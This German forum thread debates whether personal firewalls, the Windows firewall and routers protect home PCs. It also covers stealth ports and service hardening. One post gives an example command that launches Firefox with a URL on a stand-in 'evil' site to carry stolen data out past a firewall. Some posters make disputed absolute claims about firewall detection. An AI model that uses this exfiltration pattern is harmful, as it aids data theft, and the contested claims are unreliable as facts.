Das du noch nie nen Virus oder trojaner am rechner hattest, halte ich für unwahrscheinlich. Wenn er gut istm dann mnerkt der User gar nix davon..
Und da du ja keinen virenscanner benutzt.. Wie willst du wissen ob grade auf deinem Rechner ein Schädling ist, oder nicht.
Viren und Schädlinge allgemein fängt man sich heute auf unterschiedlichste Weise ein und längst nich mehr so offensichtlich.

Und bei Vista KANN man alle überflüssigen Dienste abschalten.. Wieso auch nicht. Ich hab auch ne Menge abgeschaltet die ich eh nie brauche..

Und bei Vista KANN man alle überflüssigen Dienste abschalten.. Wieso auch nicht. Ich hab auch ne Menge abgeschaltet die ich eh nie brauche..

und nebenbei werden sie alle von der internen FW geblockt wenn man ihnen keinen netzzugriff erlaubt, dann funktioniert nichtmal windows-update.

Nur mal am Rande: keine PFW dieser Welt kann den Zugriff eines Programmes auf das Internet wirksam verhindern! Wenn ein Programm wirklich ins Internet will, dann schafft es das auch, und zwar mühelos und unbemerkt an der PFW vorbei! Das hat der CCC schon vor Jahren bewiesen!

SEHR guter Tipp!
Und genau diese Video sollte sich mal jemand anschauen und dann seine meinung über Firewalls überdenken.. ;)

http://www.ulm.ccc.de/old/chaos-seminar/personal-firewalls/recording.html

Nur mal am Rande: keine PFW dieser Welt kann den Zugriff eines Programmes auf das Internet wirksam verhindern! Wenn ein Programm wirklich ins Internet will, dann schafft es das auch, und zwar mühelos und unbemerkt an der PFW vorbei! Das hat der CCC schon vor Jahren bewiesen!

*gähn*
An die Router-Firewall kommst du auch ohne Mühen vorbei, wenn du das willst, also warum nicht gleich alles weglassen?

Warum Sicherheitspatches einspielen? Du kommst auch so an das System heran... warum überhaupt Virenscanner nutzen und aktualisieren? Viren können trotzdem aufs System zukommen... ich muss schon sagen: Schwaches Argument, was ihr da herausgekramt habt. :rolleyes:

Der Sinn ist nicht 100% Sicherheit, denn die lässt sich nie erreichen, sondern erhöhte Sicherheit. Und genau das erreicht ihr damit.
Blaster wurd z.B. durch eine PFW verhindert, da der mit PFW gar nicht an die Sicherheitslücke herangekommen ist. Da hats definitiv was gebracht!
Also eurer Beispiel ist in diesem Fall völlig fürn Arsch.

An eurer Stelle würd ich erstmal überlegen, warum es nicht mal 100 Mrd $ Unternehmen gelingt, ihr System 100% abzusichern...

Es geht nicht darum die Hilflosigkeit solcher Sicherheitsmaßnahmen zu suggerieren..
Sondern sich nicht zu sicher dahinter zu fühlen und die Grenzen zu akzeptieren.

Manche hier vergöttern ja diverse Firewalls und reden die Windows Firewall kaputt..
Die Windows Firewall erfüllt ihren Zweck ausreichend.
Sie verhindert Angriffe von außen. Das tut eine Firewall nunmal so.

Manche hier vergöttern ja diverse Firewalls und reden die Windows Firewall kaputt..
Die Windows Firewall erfüllt ihren Zweck ausreichend.
Sie verhindert Angriffe von außen. Das tut eine Firewall nunmal so.

Das Problem bei der Windows-Firewall aus meiner Sicht ist aber: Jedes gottverdammte Programm kann sie stilllegen! Denn der Softwareautor weiß genau, wo die ganzen Einstellungen und Dateien dafür liegen, da sie bei jedem SP2-Rechner gleich ist. Es reicht ja schon die Dateien zu löschen. ;D

Da liegt auch die größte Gefahr! Wenn z.B. schon Programme wie uTorrent in den Optionen ne Einstellung hat, um sich (ohne Wissens des Users) in die Firewall eintragen zu können, dann ist doch irgendwie der Sinn dieser verloren gegangen...
Der Softwareersteller braucht doch nur mal mit einer der nächsten Versionen die Standardeinstellungen so setzen, das sich das Programm immer automatisch einträgt und diese per auto-aktualisierung anbieten (=letztgenannte Funktion wird wegen Faulheit nur zu gern genutzt).

Bei anderen Tools hast du ja noch die Möglichkeit, diese zu sperren (Passwort) und Zugriffsrechte (Dateien sperren) zu entziehen.

Außerdem ist es so: Wenn ein "Hacker" was vor hat (wers glaubt, wird seelig), dann nützen euch alle Schutzmaßnahmen nix.
Das ist nunmal nicht die Realität. Die meisten Angriffe stammen von irgendwelcher Schadsoftware oder über Sicherheitslücken... und gegen diese helfen selbst einfachste Maßnahmen aus.
Mir ist es immer noch tausend mal lieber, wenn irgendeine exotische Software zum Einsatz kommt (=Schadsoftware nicht drauf abgestimmt), als wenn der Schädling gleich auf die 17+ Sicherheitslücken im System setzt (PS: So viele wurden beim letzten Microsoft-Patchday behoben. ;D).

Der Sinn ist nicht 100% Sicherheit, denn die lässt sich nie erreichen, sondern erhöhte Sicherheit. Und genau das erreicht ihr damit.
Blaster wurd z.B. durch eine PFW verhindert, da der mit PFW gar nicht an die Sicherheitslücke herangekommen ist. Da hats definitiv was gebracht!
Also eurer Beispiel ist in diesem Fall völlig fürn Arsch.

Das ist doch mal eine gute Anwort...

Eine PFW oder Windows-FW bietet eine höhere Sicherheit und deckt bekannte Sicherheitslücken ab.

Und wie kommt man über einen Router in den PC? Oder warum zeigt meine Sys. trotz abgeschalteter FW und hinterm Router trotzdem "stealth" Ports an. Weniger als ohne FW geht ja nicht oder ich müsste die Patches deinst., was ja dumm wäre.

Und warum kann ein "stealth" Port nicht auch sicher sein?
Es wurde gesagt, dass ein stealth Port wie mit einer offenen Tür mit einem Vorhan wäre. Aber ein stealth Port könnte auch genauso gut eine geschlossene Tür mit Vorhang sein, oder nicht?

Da liegt auch die größte Gefahr! Wenn z.B. schon Programme wie uTorrent in den Optionen ne Einstellung hat, um sich (ohne Wissens des Users) in die Firewall eintragen zu können, dann ist doch irgendwie der Sinn dieser verloren gegangen...Der Sinn der Win-FW ist es, dme 08/15 die Zeit zu geben sich gefahrlos auf einen ungepatchten System, direkt nach einer XP Installation (wo man meistens irgendwo schon den SP2 auf einer CD hat und es als erstes nachinstalliert), die restlichen Patches gefahrlos vom MS-Server zu holen.

Hab noch nen Tipp für die Dienste Verwaltung: http://www.pc-experience.de/wbb2/thread.php?threadid=14361

Dort wird alles schön erklärt. Ich kenne Leute die mit gerade 15 Prozessen ihr Win XP starten, Ich selbst hab immer noch 39.

Ich will ja nicht nörgeln...
Aber wie kann es sein, dass die Ports über einen Router alle "closed" sind, aber die Ports, die geforwardet wurden "open" sind, wenn eine Anwendung genau diesen geforwardeten Port braucht?

Überprüft mal eure geforwardeten Ports bitte erts ohne, dann mit geöffneter Anwendung und scannt den Portbereich oder nur die Ports mit http://www.pcflank.com/scanner1.htm, die die Anwendung braucht.
Bei mir ist es jedenfalls so, dass die entsprechenden Ports open sind, wenn die Anwendung läuft. Wird die Anwendung geschlossen sind die Ports wieder closed.

Wie soll ein Router da sicherer als eine PFW sein??? Erklärung bitte!
Doch besser eine PFW benutzen?

Ich denke mir das so: Alle unbenutzten Ports werden im Router geschlossen, so dürften viele Hintertürchen zu sein. Der Rest wird dann von der Windoof Firewall noch grob geschützt. Wenn dazu noch die Dienste richtig konfiguriert sind, dürfte der PC zu 99% dicht sein. Der Rest wird durch Brain 1.0 geregelt.

PFWs dürften bei richtiger Konfig ähnlich funktionieren, nur wenn der Router ne Hardwarefirewall besitzt, dürfte diese schwerer zu knacken sein.

Ich bin jetzt "nur" 8 Jahre Online unterwegs und habe mir bisher keine schlechten Sachen eingefangen. Vielleicht habe ich bisher einfach nur Glück gehabt. Virenscanner, Ad-Aware und SpyBot S&D lasse ich regelmäßig drüber laufen. WinXP ist auch immer auf dem neuesten Stand.

Wie soll ein Router da sicherer als eine PFW sein??? Erklärung bitte!
Doch besser eine PFW benutzen?
Eine PFirewall verhält sich doch genau so. Ok, mit dem Stealth-Mode gibt sie evtl. keine closed-Meldung heraus aber ein Port ist erst offen, wenn eine Anwendung 'an ihm lauscht'.

Das Problem bei der Windows-Firewall aus meiner Sicht ist aber: Jedes gottverdammte Programm kann sie stilllegen! Denn der Softwareautor weiß genau, wo die ganzen Einstellungen und Dateien dafür liegen, da sie bei jedem SP2-Rechner gleich ist. Es reicht ja schon die Dateien zu löschen. ;D

eben nicht, die windows-FW wird von UAC geschützt und ohne adminrechte kann sich da erstmals keine software eintragen.

SP2 und UAC? Ich glaube, Ihr schreibt aneinander vorbei :|

programme die hinaus wollen finden immer einen weg und dagegen kann man gar nichts machen ausser das patchkabel rausziehen.

du kannst infos zb.: über jeden browser verschicken ohne das irgendeine firewall etwas davon merkt.
ich denke nicht das user ihren browser geblockt haben

du kannst infos über jeden browser verschicken

Nein, kannst du nicht.

Moderne Firewalls speichern den Ursprungszustand der Software. ZA Pro kann z.B. erkennen, ob das zugelassene Programm verändert wurde und verweigert dann automatisch jeden Zugriff.

Außerdem sind 99,99 % aller Schadsoftware nicht darauf angepasst, diese außer Gefecht zu setzen. Frag dich doch mal, wieviele Schädlinge es gibt, die mit der aktuellsten Version von McAfee, Kaspersky, AntiVir und sonst noch alles was anfangen können. Alle Schädlinge die älter sind als ein paar Wochen könnens nicht, also fallen schonmal ein paar hunderttausend (!) aus diesem Muster heraus.

Nein, kannst du nicht.

Moderne Firewalls speichern den Ursprungszustand der Software. ZA Pro kann z.B. erkennen, ob das zugelassene Programm verändert wurde und verweigert dann automatisch jeden Zugriff.

die schadsoftware kann trotzdem infos aus dem browser heraus verschicken, dazu muss das programm nicht verändert werde, was bei einer vernünftigen einstellung (man arbeitet nicht als admin) eh nicht passieren kann.

die schadsoftware kann trotzdem infos aus dem browser heraus verschicken, dazu muss das programm nicht verändert werde, was bei einer vernünftigen einstellung (man arbeitet nicht als admin) eh nicht passieren kann.

Falsch, kann sie nicht.
Moderne PFWs erkennen, wenn drittprogramme andere andere zum Datensenden "mißbrauchen" oder "verändern".

Wenn du z.B. ZoneAlarm hernimmst und mit dem IE surfst und den zugelassen hast, so wirst du trotzdem nochmal gefragt, ob der IE zugreifen darf, wenn ein Programm den IE zum Datensenden mißbraucht!
Bei ZoneAlarm Pro ist das noch deutlich ausgeprägter, da werden alle Programmdateien beim Erststart "gesichert" und und nur diese dürfen dann ins Netz, sobald Veränderungen (egal welcher Art) stattgefunden habe, gilt diese Berechtigung nicht mehr! Das ist schon seit Jahren gar kein Problem mehr.

OK, folgendes Szenario: du startest deinen Browser, sagen wir mal Firefox, und plötzlich popt deine PFW und fragt, ob die Datei "Firefox.exe" auf das Internet zugreifen darf. - Was tust du?

Hab mir jetzt nicht alles durchgelesen, aber:
Hast du mal die Comodo-Firewall probiert? Die ist wahrscheinlich besser als Zonealarm, und ich verwende sie jetzt seit etwa einem Monat fast ohne Probleme.

OK, folgendes Szenario: du startest deinen Browser, sagen wir mal Firefox, und plötzlich popt deine PFW und fragt, ob die Datei "Firefox.exe" auf das Internet zugreifen darf. - Was tust du?

Also ich tue: Gar nichts und prüfe "Firefox.exe".

Denn das kann bei mir gar nicht passieren, da ich sofort jedes Programm, was ich verwende, nach der Installation zulasse. Und sollte die Zulassen-Frage nochmal erscheinen, so hat sich die Anwendung - ohne meine Erlaubniss - verändert. Und genau das erkennen sogar die PFWs. ;)

Falsch, kann sie nicht.
Moderne PFWs erkennen, wenn drittprogramme andere andere zum Datensenden "mißbrauchen" oder "verändern".mmm...

Modene PFWs versuchen zu erkennen, wenn ...

Das bedeutet, sie können den einen oder anderen Schädling erkennen, aber nicht alle.

mmm...

Modene PFWs versuchen zu erkennen, wenn ...

Das bedeutet, sie können den einen oder anderen Schädling erkennen, aber nicht alle.

Ausnahmslos jede Veränderung wird bemerkt. Da gibt es kein Wenn und Aber!

Der Schädling hat nur Erfolg, wenn...
Er am System vorbei arbeitet (Rootkit), da nützt dann auch der Virenscanner nix mehr.
oder wenn er Sicherheitslücken ausnutzt (dafür muss er speziell auf diese Version ausgelegt sind).

Ansonsten hat er da gar keine Chance.

Nur wer als Admin arbeitet, für den habe ich sowieso kein Mitlied, da kann fast jedes Programm alles verändern/löschen/modifizieren. ;)

Ausnahmslos jede Veränderung wird bemerkt. Da gibt es kein Wenn und Aber!

Der Schädling hat nur Erfolg, wenn...
Er am System vorbei arbeitet (Rootkit), da nützt dann auch der Virenscanner nix mehr.
oder wenn er Sicherheitslücken ausnutzt (dafür muss er speziell auf diese Version ausgelegt sind).

Ansonsten hat er da gar keine Chance.

Nur wer als Admin arbeitet, für den habe ich sowieso kein Mitlied, da kann fast jedes Programm alles verändern/löschen/modifizieren. ;)mmm...

Nicht nur Rootkits können an PFws vorbeiarbeiten.
Ansonsten versuchst du gerade zu erklären, dass Emailprogramme wie Outlook durch eine PFw vor Viren und Schädlingen geschützt sind.
Schliesslich benutzen Viren in Emails gerne Lücken des IEs und da sollte eine PFw auch lokale Aktivitäten erkennen ...

Ob du Admin bist oder nicht, ist in diesem Fall zweitrangig. Einige der Lücken in Windows interessieren sich nicht dafür.

Wo wir bein Thema sind:

http://www.personalfirewall.comodo.com/download_firewall.html

Ich habe die am laufen und man kann auch schön die ganzen "Extras" deaktivieren.

Per Definition ist einen Firewall ein "Ding", das den Datenverkehr zwischen zwei Netzen reguliert. Somit passt das Wort eigentlich überhaupt nicht zu Anwendungen wie Zone Alarm etc. Das ganze war wohl mal ein Marketing-Trick der Hersteller, der sich (leider) soweit durchgesetzt hat, dass ja sogar die Windowseigene (und auch bei Mac) Software sich "Firewall" nennt.

Angriffe von AUßEN, können mit einer "PFW" verhindert werden. Wie? Es gibt dafür wohl nur ein Szenario. Ein Programm auf dem Rechner bietet einen Dienst nach außen an. Durch einen Fehler in dem Programm ist es eventuell möglich Fremdcode in den Rechner einzuschleußen und auszuführen. Im schlimmsten Fall ist das ganze ein Systemdienst von Windows, oder z.B. ein Server, der mit Administrationsrechten läuft. Nur: Wenn man den Dienst wirklich anbieten möchte, muss man dem Herstellen eben vertrauen, und wenn nicht, sollte man ihn einfach dekativieren bzw. nicht verwenden, dann ist auch der Einsatz einer PFW überflüssig. Wenn kein Dienst da ist, der angegriffen werden kann, ist auch nichts zu beschützen da.

Gegen "Angriffe von Innen" hilft eine PFW nur bedingt. Es ist einfach Fakt, dass sich _jede_ Firewall bisher umgehen ließ. Dennoch ist es immerhin eine Hürde, die eventuell doch etwas aufhält, was nicht darauf ausgelegt ist auch diese PFW auszutricksen (AFAIK sind die meisten doch immer noch mit Auto-Click zu überlisten). Wer jedoch auf ein Programm, dessen Hersteller er nicht traut klickt, der riskiert schließlich viel mehr als nur, dass nach-hause-telefoniert wird, und persönliche Daten missbraucht oder der PC freudig an einem Botnetz teilnimmt. Selber Schuld sag ich da mal.

Ob es das einem Wert ist, muss man selber entscheiden. Denn: Eine Firewall greift tief ins System ein um diesen "Schutz" zu gewähren, also muss man erstmal dem Firewallhersteller selber gut genug vertrauen. ZoneLabs vertrau ich wegen diverser krassen Fehlern in der Vergangeheit bestimmt nicht (z.B. das hier http://www.heise.de/newsticker/meldung/68725 ). Solchen Spasstrupps und Bauernfängern wie Norton erst recht nicht. Ich empfehle niemanden eine andere als die Windows-Firewall zu verwenden, da in den Händen von unerfahrenen Benutzern das ganze oft mehr schadet als nutzt. Des weiteren antworte ich jedem, der mich danach fragt er solle doch als Schutzmaßnahme zuerst seinen gesunden Menschenverstand einsetzen, das bringt einfach am meisten.

Und noch was kleines am Rande zu dieser "stealth" - "closed" - "open" Sache:
open bedeutet, dass der Versuch eine Verbindung zu öffnen auf diesem Port gelingt. Mehr nicht. Habe manchmal daheim einen kleinen Webserver zu Testzwecken am Laufen, um das ganze dann auch mal schnell jemand zu zeigen ist er aus dem Internet zugänglich. Ein Freund ließ neulich aus meinem Netzwerk ein solchen "Sicherheitstest" (oder wie man das nennen möchte) laufen, und stellte entsetzt fest, dass in meinem Netz eine solche Unsicherheit besteht, immerhin leuchtet das grüne Licht bei dem Test, das kann nicht gut sein!
closed bedeutet, dass der Versuch eine Verindung zu öffnen nicht gelingt, und der PC aber mit einem TCP-Reset-Paket (bzw. mittels ICMP bei einem Versuch über das UDP) antwortet, und bescheid sagt, dass hier der Port geschlossen ist. Es ist aber einfach nicht möglich hier irgendwie einzudringen
stealth bedeutet, dass die Antwort wie oben beschrieben nicht gesendet wird. Was hat man davon? Nix. Eher sogar Nachteile. Es kann vorkommen, dass Router glauben etwas sei schieß gegangen und das grob gesagt noch über einen anderen Weg versuchen. Falls die Anfrage nur bei einem falschen PC gelandet ist (Gang und gebe, wegen dynamischen IPs und P2P-Netzen), wird der Verbindungsaufbau eventuell immer wieder wiederholt, bis es zum Timeout kommt.
In meinen Augen sogar unfreundlich auf so etwas nicht zu antworten, ich antworte auch freundlich auf Pings, oder bibbert ihr und habt Angst vor einer DoS-Attacke per ICMP? Das ganze Zeug wurde nicht zum Spass eingeführt, sondert hat schon seinen Sinn.

Und noch was dazu, dass gesagt wurde, die Konfiguration von Router sei nur unnötig kompliziert:
Erstmal hilft ein Router pratkisch nichts für die Sicherheit, nur die Tatsache, dass in normalen privaten Kleinnetzen die per PPP ins Internet verbunden sind handelt es sich eben um einen Router mit NAT. Bei ausgehenden Verbindungen (Spielen, Surfen, IM, Mails abrufen etc) ändert sich (bei Normalkonfigurationen) rein gar nichts. Nur wenn man einen eigenen Dienst betreieben möchte, muss man dies einstellen per Masquarade (aka Port Forward). Aber ansich ist NAT eine sehr hässliche Sache die einiges behindert. Das ganze stirbt mit einer Einführung von IPv6 beim Endkunden hoffentlich bald einen furchtbaren Tod.

Also ich tue: Gar nichts und prüfe "Firefox.exe".

Denn das kann bei mir gar nicht passieren, da ich sofort jedes Programm, was ich verwende, nach der Installation zulasse. Und sollte die Zulassen-Frage nochmal erscheinen, so hat sich die Anwendung - ohne meine Erlaubniss - verändert. Und genau das erkennen sogar die PFWs. ;)

OK, was genau bedeutet "du prüfst die Firefox.exe"? Was genau tust du dabei?

Die Frage ist ja, warum die Nachfrage der PFW erscheint. Vielleicht hat sich Firefox ein Update gezogen. Oder die PFW hat sich aktuelisiert. Oder die PFW spinnt einfach herum, denn sie ist eine Software und damit potentiell fehleranfällig.

Und abschließend noch einmal meine Frage: angenommen die Nachfrage der PFW erscheint auch nach eingehender Prüfung von Firefox.exe noch einmal. Was tust du? Um die Sache abzukürzen: du wirst dich vielleicht ein wenig wundern, aber du wirst am Ende auf "Erlauben" drücken und das war's. Und im "Worst Case" hast du damit einer Malware Zugang auf das Internet gegeben.

@Gast:

Wie schützt Duch dich gegen einen Aufruf von

C:\Programme\Firefox\firefox.exe http://www.boeseWebseite.com/boesesScript.php?VieleVieleBunteDaten

So etwas kann keine Firewall abfangen. Wie auch.

@Gast:

Wie schützt Duch dich gegen einen Aufruf von

C:\Programme\Firefox\firefox.exe http://www.boeseWebseite.com/boesesScript.php?VieleVieleBunteDaten

So etwas kann keine Firewall abfangen. Wie auch.
sicher doch.
Irgendein Programm/ActiveX/Virus muss das doch aufrufen - und das sieht die FW meist auch...


btw:
immer gerne gelesen: http://www.iks-jena.de/mitarb/lutz/usenet/Firewall.html

sicher doch.
Irgendein Programm/ActiveX/Virus muss das doch aufrufen - und das sieht die FW meist auch...

Wie soll denn die FW das sehen?!

Probier das doch mal: Gib so etwas in eine Kommandoshell ein. Und, merkt Deine FW etwas? :)

@Gast: Wie schützt Duch dich gegen einen Aufruf von

C:\Programme\Firefox\firefox.exe http://www.boeseWebseite.com/boesesScript.php?VieleVieleBunteDaten

Davon red ich die ganze Zeit! Das geht schon seit Jahren!

Sobald eine zugelassene Anwendung durch ein Drittprogramm (nicht von selbst) aufgerufen wird und das ist die Ausführen-Funktion nunmal, fragt die PFW nach erneuter Zulassung...

Das gleiche passiert auch, wenn du z.B. in einer Anwendung auf einen HTML-Link klickst und sich dadurch der Browser öffnet... wird bei mir jedes mal automatisch geblockt.

Davon red ich die ganze Zeit! Das geht schon seit Jahren!

Sobald eine zugelassene Anwendung durch ein Drittprogramm (nicht von selbst) aufgerufen wird und das ist die Ausführen-Funktion nunmal, fragt die PFW nach erneuter Zulassung...

Das gleiche passiert auch, wenn du z.B. in einer Anwendung auf einen HTML-Link klickst und sich dadurch der Browser öffnet... wird bei mir jedes mal automatisch geblockt.

Wie unterscheidet denn die PW wie der Browser gestartet wurde?

Wie unterscheidet denn die PW wie der Browser gestartet wurde?

Das ist ganz einfach:
Die PFW kann erkennen, ob Eingaben von Tastatur/Maus stammen oder von einem Programm. Bei letzterem wird generell geblockt (sofort nicht explizit zugelassen).

Ergo: Ich muss Schadsoftware auf dem Rechner haben, bevor sie irgendetwas anrichten kann. Und das scheitert ja schon daran, das der Virenscanner als zusätzliches Mittel dient und die PFW in solchen Fällen den kompletten Zugriff auf das Internet verwehren kann.

Bei den Usern, die jedes mal den Internetzugriff bestätigen (also bei jedem Zugriff der Anwendung) ist nicht mal das drin ...

Ich habe jetzt auch nicht die Lust stundenblock um die Theorie zu reden: Warum probierst du es nicht mal aus? Ist doch schnell installiert... (auch in der VM :).

/Dein Windows erkennt doch auch, wann es in den Energiesparmodus schalten soll (wenn Film läuft und keine Usereingaben getätigt werden z.B nicht).

Das ist ganz einfach:
Die PFW kann erkennen, ob Eingaben von Tastatur/Maus stammen oder von einem Programm. Bei letzterem wird generell geblockt (sofort nicht explizit zugelassen).

Genau daran kann die PW das sicher nicht unterscheiden.

Spätestens wenn eine bereits laufende Instanz des Browsers mit der Anzeige einer Seite beauftragt wird, kann ich mir nicht mehr vorstellen, wie die PW das erkennen möchte.

Kann dieses Verhalten denn irgendjemand anderes bestätigen? Oder einen Link auf eine Quelle, die das Verhalten beschreibt?

Genau daran kann die PW das sicher nicht unterscheiden.

Warum sollte sie es nicht? Sie kann doch unterscheiden, woher die Eingaben kommen... von einem Programm oder von einer Schnittstelle am PC.
Und wenn dann ein Programm ins Spiel kommt, welches automatische Tasteneingaben ("falsche/illegale") Tasteneingaben tätigt, so erkennt der Virenscanner dies in der Regel auch (oder die Heuristik).

Wie schon gesagt, teste es einfach selbst, besser kann es niemand erklären als der self-Test. ;)

Ich halte das auf jeden Fall für einen Sicherheitsanstieg. Denn Viren, die ich mir einfangen würde (z.B. durch Klick auf ne verseuchte, verschlüsselte exe) würden sich zwar einnisten, aber könnten nicht im Netz, so lang sie keinen expliziten Schadcode für die von mir genutzte Softwareversion mitbringen (=sehr unwahrscheinlich, es müsste ein brandneuer Schädling sein, die alten könnens nicht, somit fallen 99,9% schon durchs Raster).

/Was ich auch gut finde: Bei den kommerziellen Paketen von ZoneLabs wird zusätzlich noch die HOST-Datei gelocked und es können (Browser-) Scripte unterdrückt werden. VBS Dateien können ebenfalls an der Ausführung gehindert werden. So ist dann schonmal ein Schadenspotential weniger vorhanden.

Warum sollte sie es nicht? Sie kann doch unterscheiden, woher die Eingaben kommen... von einem Programm oder von einer Schnittstelle am PC.
Und wenn dann ein Programm ins Spiel kommt, welches automatische Tasteneingaben ("falsche/illegale") Tasteneingaben tätigt, so erkennt der Virenscanner dies in der Regel auch (oder die Heuristik).

Wie schon gesagt, teste es einfach selbst, besser kann es niemand erklären als der self-Test. ;)

Ich halte das auf jeden Fall für einen Sicherheitsanstieg. Denn Viren, die ich mir einfangen würde (z.B. durch Klick auf ne verseuchte, verschlüsselte exe) würden sich zwar einnisten, aber könnten nicht im Netz, so lang sie keinen expliziten Schadcode für die von mir genutzte Softwareversion mitbringen (=sehr unwahrscheinlich, es müsste ein brandneuer Schädling sein, die alten könnens nicht, somit fallen 99,9% schon durchs Raster).

Wofür z.B. Tastatureingaben an den Browser? Du kannst ohne weiteres Tastatureingaben via Programm simulieren, und wie soll eine FW das blocken, wenn der User das Programm vorher installiert/akzepiert hat?

Garnicht!

/Was ich auch gut finde: Bei den kommerziellen Paketen von ZoneLabs wird zusätzlich noch die HOST-Datei gelocked und es können (Browser-) Scripte unterdrückt werden. VBS Dateien können ebenfalls an der Ausführung gehindert werden. So ist dann schonmal ein Schadenspotential weniger vorhanden.

dazu braucht es keine FW, das kann das system selbst.

wenn der User das Programm vorher installiert/akzepiert hat?

Warum sollte ich so ein Programm installieren und zulassen?Das erschließt sich mir nicht ganz!
Ich installiere es, lasse es aber nicht zu. Außerdem scann ich jede EXE und alle Schadcodedateien (ob nun bat, vbs oder die verschleierten jpeg.vbs - egal) vorher mit dem Virenscanner... wieviel kommt am Ende durch? In den letzten Jahren bei mir 0,00 %. :)

Bei der Pro-Versionen wird außerdem nicht nur die Exe "gesichert", sondern auch die von ihr verwenden Programmdateien (also dll und sonst noch alles). Hier kann die PFW jede Änderung erkennen (auch an der TCP/IP.sys).

Bei der Free-Version beschränken sie sich nur auf die Exe (Checksumme glaub ich).

dazu braucht es keine FW, das kann das system selbst.

Wie blocke ich denn Scripte mit Boardmitteln, ohne das mir Funktionen verloren gehen? Und damit mein ich nicht JavaScript...

Warum sollte ich so ein Programm installieren und zulassen?Das erschließt sich mir nicht ganz!
Ich installiere es, lasse es aber nicht zu. Außerdem scann ich jede EXE und alle Schadcodedateien (ob nun bat, vbs oder die verschleierten jpeg.vbs - egal) vorher mit dem Virenscanner... wieviel kommt am Ende durch? In den letzten Jahren bei mir 0,00 %. :)

Bei der Pro-Versionen wird außerdem nicht nur die Exe "gesichert", sondern auch die von ihr verwenden Programmdateien (also dll und sonst noch alles). Hier kann die PFW jede Änderung erkennen (auch an der TCP/IP.sys).

Bei der Free-Version beschränken sie sich nur auf die Exe (Checksumme glaub ich).

Nö, selbst, wenn (un-)zertifiziert, aber (hauptsache) zugelassen, kann Progrämmchen tun und lassen, was es will. :tongue:

Nö, selbst, wenn (un-)zertifiziert, aber (hauptsache) zugelassen, kann Progrämmchen tun und lassen, was es will. :tongue:

Gib mir mal ein Beispiel...

Die Vorraussetzungen:
Windows XP, SP2, aktuell gepatched
Admin Account (alles eingerichtet), Benutzteraccount zum Surfen/Arbeiten.

Zugriffsrechte entzogen für \Windows und die meisten Anwendungen unter \Programme.

Wie magst du da etwas ändern ?

Gib mir mal ein Beispiel...

Die Vorraussetzungen:
Windows XP, SP2, aktuell gepatched
Admin Account (alles eingerichtet), Benutzteraccount zum Surfen/Arbeiten.

Zugriffsrechte entzogen für \Windows und die meisten Anwendungen unter \Programme.

Wie magst du da etwas ändern ?

Beispiel? :lol: Soll ich dirn Programm schreiben, daß irgendwas via Port 80 verschickt? .net bietet nen simplen Browser-Namesspace dafür.

Beispiel? :lol: Soll ich dirn Programm schreiben, daß irgendwas via Port 80 verschickt?

Ja. Gib mir irgendein konkretes Beispiel, welches auch funktioniert.

Allein schon aufgrund der Tatsache, das ich Software wie diese gar nicht erst installieren würde (daran scheitert es schon), hat diese also gar keine Chance. Und was will sie ändern?

Sie kann meinetwegen Winmap oder IrfanView löschen, das installiere ich dann halt neu. ;D
An den Rest kommt sie gar nicht erst ran...

Ja. Gib mir irgendein konkretes Beispiel, welches auch funktioniert.

Allein schon aufgrund der Tatsache, das ich Software wie diese gar nicht erst installieren würde (daran scheitert es schon), hat diese also gar keine Chance. Und was will sie ändern?

Sie kann meinetwegen Winmap oder IrfanView löschen, das installiere ich dann halt neu. ;D
An den Rest kommt sie gar nicht erst ran...

Du würdest .net nicht installieren? :lol: Nein, Schabernack, du würdest vielleicht irgendein Programm nicht installieren. Was aber, wenn es aus "vertrauenswürdiger", also privater oder zertifizierter Quelle käme? Hmm, ja, 2-20x könntest dus vielleicht verhindern, aber nicht immer!

Wenn ich dirn Programm schreiben soll: Verhandlungsbasis, aber nicht unter €500.-/Tag.

du bist stealth genauso sichtbar wie closed.
primäre aufgabe einer firewall ist der paketfilter.

du bist stealth genauso sichtbar wie closed.

primäre aufgabe einer firewall ist der paketfilter, jedoch sind routingfirewalls relativ unbrauchbar und brdiging firewalls eher zu empfehlen.

ein router ist keine firewall

Ist doch total Banane. Pakete über P80 filtern ist ne Highend Aufgabe, meinentwegen KI. Heutzutage nicht möglich, vor allem dann nicht, wenn vom Admin der Intrusor als sicher abgesegnet ist. Puff.

es gab doch in den ganzen softwarefirewalls schon etliche sicherheitslücken und zone labs hatte glaube ich einer der schwerwiegensten

ich finde es reicht wenn home user den process explorer betrachten - normalen virenscanner ala antivir verwenden und dienste schliessen die nicht verwendet werden sowie regelmässig das betriessystem + software patchen.

das eigentlich problem ist ...... real player / win media player / icq / skype etc. alles progs die sicherheitslücken haben und hatten - da bringt dir eine softwarefirewall gar nichts genaus wie die win firewall oder ein router.

das einzige was hier sinn macht ist eine bridged firewall in dezidierter hardwareform

es gab doch in den ganzen softwarefirewalls schon etliche sicherheitslücken und zone labs hatte glaube ich einer der schwerwiegensten

ZilD, so isses möglich! :)

so sieht ne super firewall aus ...... steht sogar drauf ;D

http://www.schrankmonster.de/content/binary/IMG_0170_thumb.jpg

so sieht ne super firewall aus ...... steht sogar drauf ;D

http://www.schrankmonster.de/content/binary/IMG_0170_thumb.jpg


W-O-W!123 Ein Pfw-Schrankmonster P80 infiltrator!!! Ist das deiner??

Du würdest .net nicht installieren? :lol:

Tatsächlich habe ich .Net nicht installiert. Bremst meinen Spielerechner nur aus (CCC lässt grüßen) und brauchen tue ich es nie. Immer noch nicht, obwohl mir Microsoft seit Jahren das Gegenteil zu beweisen versucht.

Was aber, wenn es aus "vertrauenswürdiger", also privater oder zertifizierter Quelle käme? Hmm, ja, 2-20x könntest dus vielleicht verhindern, aber nicht immer!

Für dubiose Software habe ich meinen Benutzeraccount und eine virtuelle Maschine, in denen mir das ziemlich egal ist. Die sind nach spätestens 5 Minuten frisch aufgesetzt. War aber noch nie nötig.

Wenn ich dirn Programm schreiben soll: Verhandlungsbasis, aber nicht unter €500.-/Tag.

Also kannst du kein Beispiel erbringen?

es gab doch in den ganzen softwarefirewalls schon etliche sicherheitslücken und zone labs hatte glaube ich einer der schwerwiegensten

Da gilt es den Unterschied zu beachten:

Wieviele Sicherheitslücken hat dein Betriebssystem, inklusive allen Programmen?
Ich behaupte mehr als eine... denn zuletzt wurden 17 allein in Windows gepatched. :)

Wenn du nun ein Programm nutzt, das in der Lage ist, meinetwagen 20 Sicherheitslücken zu überdecken und dafür selbst nur eine oder zwei hat. Ist das kein Sicherheitsgewinn?

Wenn das Risiko, das jemand das System angreifen kann, um ein vielfaches gesunken ist?

